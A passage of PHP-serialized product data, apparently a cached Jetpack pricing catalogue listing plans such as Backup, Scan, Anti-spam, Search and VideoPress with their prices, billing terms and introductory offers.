Boost\";s:12:\"product_slug\";s:23:\"jetpack_boost_bi_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:13:\"jetpack-boost\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$383.04\";s:21:\"combined_cost_display\";s:7:\"$383.04\";s:4:\"cost\";d:383.04000000000002046363078989088535308837890625;s:18:\"cost_smallest_unit\";i:38304;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:9:\"two years\";s:22:\"product_term_localized\";s:9:\"two years\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:2;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:287.04000000000002046363078989088535308837890625;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:6:\"$15.96\";}s:30:\"jetpack_social_basic_bi_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2037;s:12:\"product_name\";s:20:\"Jetpack Social Basic\";s:12:\"product_slug\";s:30:\"jetpack_social_basic_bi_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:27:\"jetpack-social-basic-yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$238.80\";s:21:\"combined_cost_display\";s:7:\"$238.80\";s:4:\"cost\";d:238.80000000000001136868377216160297393798828125;s:18:\"cost_smallest_unit\";i:23880;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:9:\"two years\";s:22:\"product_term_localized\";s:9:\"two years\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:2;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:143.05000000000001136868377216160297393798828125;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:5:\"$9.95\";}s:22:\"jetpack_scan_bi_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2038;s:12:\"product_name\";s:18:\"Jetpack Scan Daily\";s:12:\"product_slug\";s:22:\"jetpack_scan_bi_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:12:\"jetpack-scan\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$191.04\";s:21:\"combined_cost_display\";s:7:\"$191.04\";s:4:\"cost\";d:191.039999999999992041921359486877918243408203125;s:18:\"cost_smallest_unit\";i:19104;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:9:\"two years\";s:22:\"product_term_localized\";s:9:\"two years\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:2;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:143.039999999999992041921359486877918243408203125;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:5:\"$7.96\";}s:27:\"jetpack_anti_spam_bi_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2039;s:12:\"product_name\";s:25:\"Jetpack Akismet Anti-spam\";s:12:\"product_slug\";s:27:\"jetpack_anti_spam_bi_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:17:\"jetpack-anti-spam\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$191.04\";s:21:\"combined_cost_display\";s:7:\"$191.04\";s:4:\"cost\";d:191.039999999999992041921359486877918243408203125;s:18:\"cost_smallest_unit\";i:19104;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:9:\"two years\";s:22:\"product_term_localized\";s:9:\"two years\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:2;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:143.039999999999992041921359486877918243408203125;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:5:\"$7.96\";}s:41:\"jetpack_backup_addon_storage_10gb_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2040;s:12:\"product_name\";s:47:\"Jetpack VaultPress Backup Add-on Storage (10GB)\";s:12:\"product_slug\";s:41:\"jetpack_backup_addon_storage_10gb_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:33:\"jetpack-backup-addon-storage-10gb\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$2.95\";s:21:\"combined_cost_display\";s:5:\"$2.95\";s:4:\"cost\";d:2.95000000000000017763568394002504646778106689453125;s:18:\"cost_smallest_unit\";i:295;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:42:\"jetpack_backup_addon_storage_100gb_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2044;s:12:\"product_name\";s:48:\"Jetpack VaultPress Backup Add-on Storage (100GB)\";s:12:\"product_slug\";s:42:\"jetpack_backup_addon_storage_100gb_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:34:\"jetpack-backup-addon-storage-100gb\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$5.95\";s:21:\"combined_cost_display\";s:5:\"$5.95\";s:4:\"cost\";d:5.95000000000000017763568394002504646778106689453125;s:18:\"cost_smallest_unit\";i:595;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:40:\"jetpack_backup_addon_storage_1tb_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2048;s:12:\"product_name\";s:46:\"Jetpack VaultPress Backup Add-on Storage (1TB)\";s:12:\"product_slug\";s:40:\"jetpack_backup_addon_storage_1tb_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:32:\"jetpack-backup-addon-storage-1tb\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$9.95\";s:21:\"combined_cost_display\";s:5:\"$9.95\";s:4:\"cost\";d:9.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:40:\"jetpack_backup_addon_storage_3tb_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2052;s:12:\"product_name\";s:46:\"Jetpack VaultPress Backup Add-on Storage (3TB)\";s:12:\"product_slug\";s:40:\"jetpack_backup_addon_storage_3tb_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:32:\"jetpack-backup-addon-storage-3tb\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$19.95\";s:21:\"combined_cost_display\";s:6:\"$19.95\";s:4:\"cost\";d:19.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:1995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:40:\"jetpack_backup_addon_storage_5tb_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2056;s:12:\"product_name\";s:46:\"Jetpack VaultPress Backup Add-on Storage (5TB)\";s:12:\"product_slug\";s:40:\"jetpack_backup_addon_storage_5tb_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:32:\"jetpack-backup-addon-storage-5tb\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$29.95\";s:21:\"combined_cost_display\";s:6:\"$29.95\";s:4:\"cost\";d:29.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:2995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:20:\"jetpack_backup_daily\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2100;s:12:\"product_name\";s:22:\"Jetpack Backup (Daily)\";s:12:\"product_slug\";s:20:\"jetpack_backup_daily\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:20:\"jetpack-backup-daily\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$119.00\";s:21:\"combined_cost_display\";s:4:\"$119\";s:4:\"cost\";i:119;s:18:\"cost_smallest_unit\";i:11900;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";i:59;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:5:\"$9.92\";}s:28:\"jetpack_backup_daily_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2101;s:12:\"product_name\";s:22:\"Jetpack Backup (Daily)\";s:12:\"product_slug\";s:28:\"jetpack_backup_daily_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:20:\"jetpack-backup-daily\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$9.95\";s:21:\"combined_cost_display\";s:5:\"$9.95\";s:4:\"cost\";d:9.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:23:\"jetpack_backup_realtime\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2102;s:12:\"product_name\";s:26:\"Jetpack Backup (Real-time)\";s:12:\"product_slug\";s:23:\"jetpack_backup_realtime\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-backup-realtime\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$599.00\";s:21:\"combined_cost_display\";s:4:\"$599\";s:4:\"cost\";i:599;s:18:\"cost_smallest_unit\";i:59900;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";i:299;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:6:\"$49.92\";}s:31:\"jetpack_backup_realtime_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2103;s:12:\"product_name\";s:26:\"Jetpack Backup (Real-time)\";s:12:\"product_slug\";s:31:\"jetpack_backup_realtime_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-backup-realtime\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$49.95\";s:21:\"combined_cost_display\";s:6:\"$49.95\";s:4:\"cost\";d:49.9500000000000028421709430404007434844970703125;s:18:\"cost_smallest_unit\";i:4995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:14:\"jetpack_search\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:2104;s:12:\"product_name\";s:14:\"Jetpack Search\";s:12:\"product_slug\";s:14:\"jetpack_search\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"search\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:14:\"jetpack-search\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$100.00\";s:21:\"combined_cost_display\";s:4:\"$100\";s:4:\"cost\";i:100;s:18:\"cost_smallest_unit\";i:10000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:1:{i:0;O:8:\"stdClass\":12:{s:13:\"minimum_units\";i:0;s:13:\"maximum_units\";N;s:13:\"minimum_price\";i:0;s:13:\"maximum_price\";i:0;s:28:\"transform_quantity_divide_by\";i:10000;s:24:\"transform_quantity_round\";s:2:\"up\";s:8:\"flat_fee\";i:0;s:12:\"per_unit_fee\";i:10000;s:21:\"minimum_price_display\";s:2:\"$0\";s:29:\"minimum_price_monthly_display\";s:2:\"$0\";s:21:\"maximum_price_display\";N;s:29:\"maximum_price_monthly_display\";N;}}s:25:\"price_tier_usage_quantity\";i:563;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$8.33\";}s:22:\"jetpack_search_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2105;s:12:\"product_name\";s:14:\"Jetpack Search\";s:12:\"product_slug\";s:22:\"jetpack_search_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"search\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:14:\"jetpack-search\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$12.95\";s:21:\"combined_cost_display\";s:6:\"$12.95\";s:4:\"cost\";d:12.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:1295;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:1:{i:0;O:8:\"stdClass\":12:{s:13:\"minimum_units\";i:0;s:13:\"maximum_units\";N;s:13:\"minimum_price\";i:0;s:13:\"maximum_price\";i:0;s:28:\"transform_quantity_divide_by\";i:10000;s:24:\"transform_quantity_round\";s:2:\"up\";s:8:\"flat_fee\";i:0;s:12:\"per_unit_fee\";i:1295;s:21:\"minimum_price_display\";s:2:\"$0\";s:29:\"minimum_price_monthly_display\";s:2:\"$0\";s:21:\"maximum_price_display\";N;s:29:\"maximum_price_monthly_display\";N;}}s:25:\"price_tier_usage_quantity\";i:563;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:12:\"jetpack_scan\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2106;s:12:\"product_name\";s:18:\"Jetpack Scan Daily\";s:12:\"product_slug\";s:12:\"jetpack_scan\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:12:\"jetpack-scan\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$119.40\";s:21:\"combined_cost_display\";s:7:\"$119.40\";s:4:\"cost\";d:119.400000000000005684341886080801486968994140625;s:18:\"cost_smallest_unit\";i:11940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:59.39999999999999857891452847979962825775146484375;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:5:\"$9.95\";}s:20:\"jetpack_scan_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2107;s:12:\"product_name\";s:18:\"Jetpack Scan Daily\";s:12:\"product_slug\";s:20:\"jetpack_scan_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:12:\"jetpack-scan\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$14.95\";s:21:\"combined_cost_display\";s:6:\"$14.95\";s:4:\"cost\";d:14.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:1495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:21:\"jetpack_scan_realtime\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:2108;s:12:\"product_name\";s:21:\"Jetpack Scan Realtime\";s:12:\"product_slug\";s:21:\"jetpack_scan_realtime\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack-scan-realtime\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$500.00\";s:21:\"combined_cost_display\";s:4:\"$500\";s:4:\"cost\";i:500;s:18:\"cost_smallest_unit\";i:50000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:6:\"$41.67\";}s:29:\"jetpack_scan_realtime_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2109;s:12:\"product_name\";s:21:\"Jetpack Scan Realtime\";s:12:\"product_slug\";s:29:\"jetpack_scan_realtime_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack-scan-realtime\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$50.00\";s:21:\"combined_cost_display\";s:3:\"$50\";s:4:\"cost\";i:50;s:18:\"cost_smallest_unit\";i:5000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:17:\"jetpack_anti_spam\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2110;s:12:\"product_name\";s:25:\"Jetpack Akismet Anti-spam\";s:12:\"product_slug\";s:17:\"jetpack_anti_spam\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:17:\"jetpack-anti-spam\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$119.40\";s:21:\"combined_cost_display\";s:7:\"$119.40\";s:4:\"cost\";d:119.400000000000005684341886080801486968994140625;s:18:\"cost_smallest_unit\";i:11940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:59.39999999999999857891452847979962825775146484375;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:5:\"$9.95\";}s:25:\"jetpack_anti_spam_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2111;s:12:\"product_name\";s:25:\"Jetpack Akismet Anti-spam\";s:12:\"product_slug\";s:25:\"jetpack_anti_spam_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:17:\"jetpack-anti-spam\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$14.95\";s:21:\"combined_cost_display\";s:6:\"$14.95\";s:4:\"cost\";d:14.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:1495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:24:\"jetpack_backup_t1_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2112;s:12:\"product_name\";s:32:\"Jetpack VaultPress Backup (10GB)\";s:12:\"product_slug\";s:24:\"jetpack_backup_t1_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack-backup-tier-1\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$119.40\";s:21:\"combined_cost_display\";s:7:\"$119.40\";s:4:\"cost\";d:119.400000000000005684341886080801486968994140625;s:18:\"cost_smallest_unit\";i:11940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:59.39999999999999857891452847979962825775146484375;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:5:\"$9.95\";}s:25:\"jetpack_backup_t1_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2113;s:12:\"product_name\";s:32:\"Jetpack VaultPress Backup (10GB)\";s:12:\"product_slug\";s:25:\"jetpack_backup_t1_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack-backup-tier-1\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$14.95\";s:21:\"combined_cost_display\";s:6:\"$14.95\";s:4:\"cost\";d:14.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:1495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:24:\"jetpack_backup_t2_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2114;s:12:\"product_name\";s:31:\"Jetpack VaultPress Backup (1TB)\";s:12:\"product_slug\";s:24:\"jetpack_backup_t2_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack-backup-tier-2\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$359.40\";s:21:\"combined_cost_display\";s:7:\"$359.40\";s:4:\"cost\";d:359.3999999999999772626324556767940521240234375;s:18:\"cost_smallest_unit\";i:35940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:143.400000000000005684341886080801486968994140625;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:6:\"$29.95\";}s:25:\"jetpack_backup_t2_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2115;s:12:\"product_name\";s:31:\"Jetpack VaultPress Backup (1TB)\";s:12:\"product_slug\";s:25:\"jetpack_backup_t2_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack-backup-tier-2\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$29.95\";s:21:\"combined_cost_display\";s:6:\"$29.95\";s:4:\"cost\";d:29.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:2995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:18:\"jetpack_videopress\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2116;s:12:\"product_name\";s:18:\"Jetpack VideoPress\";s:12:\"product_slug\";s:18:\"jetpack_videopress\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:18:\"jetpack-videopress\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$119.40\";s:21:\"combined_cost_display\";s:7:\"$119.40\";s:4:\"cost\";d:119.400000000000005684341886080801486968994140625;s:18:\"cost_smallest_unit\";i:11940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s: